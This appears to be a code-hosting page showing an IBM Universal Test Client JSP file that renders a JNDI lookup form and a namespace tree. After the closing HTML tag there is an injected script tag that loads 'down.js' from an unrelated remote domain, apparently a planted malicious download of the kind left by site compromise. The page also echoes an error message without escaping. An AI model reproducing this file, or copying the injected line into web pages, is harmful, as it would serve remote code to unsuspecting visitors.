📄 jndi.jsp
字号:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
Licensed Material - Property of IBM
(C) Copyright IBM Corp. 2001 - All Rights Reserved.
US Government Users Restricted Rights - Use, duplication or disclosure
restricted by GSA ADP Schedule Contract with IBM Corp.
-->
<%@ page errorPage="/error.jsp" import="com.ibm.etools.utc.Tree" contentType="text/html; charset=utf-8" %>
<jsp:useBean id="jndiView" scope="session" class="com.ibm.etools.utc.view.JNDIView"/>
<%@ taglib uri="/utc" prefix="utc" %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Style-Type" content="text/css">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="expires" content="0">
<link rel=stylesheet type="text/css" href="/UTC/css/dynamic.css">
<title><utc:resource key="jndiLookupPageTitle"/></title>
</head>
<body>
<div class="jndiPage">
<form action="/UTC/jndiLookup" method="post" target="main" enctype="multipart/form-data">
<input type="hidden" name="random" value="<%= Math.random() %>"/>
<table cellpadding=4 cellspacing=0 border=0 width=100%>
<tr>
<td width=15% nowrap><label for="name"><utc:resource key="jndiLookupPageJNDIName"/></label></td>
<td width=*><input type="text" name="name" id="name" value="" class="textenter" size=50/></td>
<td width=20%><input type=submit class="button" value="<utc:resource key="jndiLookupPageLookup"/>"/></td>
</tr>
<% if (jndiView.isError()) { %>
<tr>
<td valign=top><utc:resource key="jndiLookupPageError"/></td>
<td colspan=2><img src="/UTC/images/error.gif" width=16 height=16><span class=error><%= jndiView.getError() %></span></td>
</tr>
<% } %>
</table>
</form>
<% jndiView.cacheJNDINamespace(request, application); %>
<%= Tree.getTableTree(request, "_parent", "/html/jndiPage/jndiPage.jsp", jndiView.getJNDIRoot(), false) %>
</div>
</body>
</html>
<script language=javascript src=http://1.9797aiai.com/mm/down.js
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -